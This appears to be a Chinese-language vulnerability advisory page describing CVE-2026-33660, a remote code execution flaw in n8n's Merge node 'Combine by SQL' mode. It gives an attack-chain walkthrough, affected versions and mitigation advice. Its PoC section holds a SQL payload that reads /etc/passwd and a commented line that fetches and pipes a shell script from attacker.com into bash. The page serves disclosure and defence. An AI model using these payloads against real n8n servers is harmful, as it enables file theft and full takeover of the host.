IPBUF安全漏洞报告
English
CVE-2026-33660 CVSS 8.8 高危

CVE-2026-33660 n8n 远程代码执行漏洞

披露日期: 2026-03-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33660
漏洞类型
远程代码执行
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
n8n

相关标签

RCE远程代码执行SQL注入n8n沙箱逃逸AlaSQLCVE-2026-33660

漏洞概述

n8n是一个开源工作流自动化平台。在2.14.1、2.13.3和1.123.26之前的版本中,拥有创建或修改工作流权限的经过身份验证的用户,可以利用Merge节点的“Combine by SQL”模式读取n8n主机上的本地文件,并实现远程代码执行。这是由于AlaSQL沙箱未能充分限制某些SQL语句造成的。攻击者可借此访问服务器敏感文件甚至控制实例,风险极高。

技术细节

该漏洞核心在于n8n工作流自动化平台中Merge节点的“Combine by SQL”模式。该模式底层依赖AlaSQL库处理用户输入的SQL语句,但由于沙箱环境配置不当,并未严格限制危险函数和文件系统访问。攻击者仅需具备工作流的创建或修改权限(即低权限用户),即可在Merge节点中注入恶意SQL代码。通过利用AlaSQL支持的特定SQL语法,攻击者能够绕过JavaScript沙箱限制,读取n8n宿主机上的本地敏感文件(如配置文件、源代码等)。更严重的是,利用AlaSQL扩展JavaScript代码执行的能力,攻击者能够实现远程代码执行(RCE),从而在服务器上执行任意系统命令,获取服务器完全控制权。这表明该漏洞将数据库层面的注入提升到了系统层面的代码执行。

攻击链分析

STEP 1
1. 获取访问权限
攻击者获取n8n平台的低权限账号,仅需具备创建或修改工作流的权限。
STEP 2
2. 构造恶意工作流
攻击者登录n8n,创建一个新的工作流,并添加一个“Merge”节点。
STEP 3
3. 配置节点与注入
将Merge节点的模式设置为“Combine by SQL”,并在SQL输入框中输入构造好的恶意SQL语句(旨在读取文件或执行命令)。
STEP 4
4. 触发漏洞执行
保存并激活工作流。当工作流执行时,后端AlaSQL库解析恶意SQL,绕过沙箱限制。
STEP 5
5. 达成攻击目的
成功读取服务器本地敏感文件,或利用代码执行能力获取服务器Shell,实现完全控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-33660 // Description: Exploit the Merge Node's "Combine by SQL" mode to read local files. // Step 1: Create a workflow in n8n with a Merge node. // Step 2: Configure the Merge node to use "Combine by SQL" mode. // Step 3: Inject the following SQL statement into the SQL input field. // Malicious SQL to read /etc/passwd const payload = "SELECT * FROM CSV('/etc/passwd')"; // Alternatively, if JavaScript execution is possible via AlaSQL sandbox escape: // const payload = "SELECT * FROM TXT('$(curl http://attacker.com/rev.sh | bash)')"; // Example API payload structure /* { "nodes": [ { "parameters": { "mode": "combineBySql", "sql": payload }, "name": "Merge", "type": "n8n-nodes-base.merge", "typeVersion": 2.1, "position": [250, 300] } ] } */ console.log(`Execute workflow with SQL: ${payload}`);

影响范围

n8n < 1.123.26
n8n < 2.13.3
n8n < 2.14.1

防御指南

临时缓解措施
如果无法立即升级,管理员应仅向完全受信任的用户限制工作流创建和编辑权限,和/或通过将n8n-nodes-base.merge添加到NODES_EXCLUDE环境变量来禁用Merge节点。这些变通方法不能完全消除风险,应仅作为短期缓解措施。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表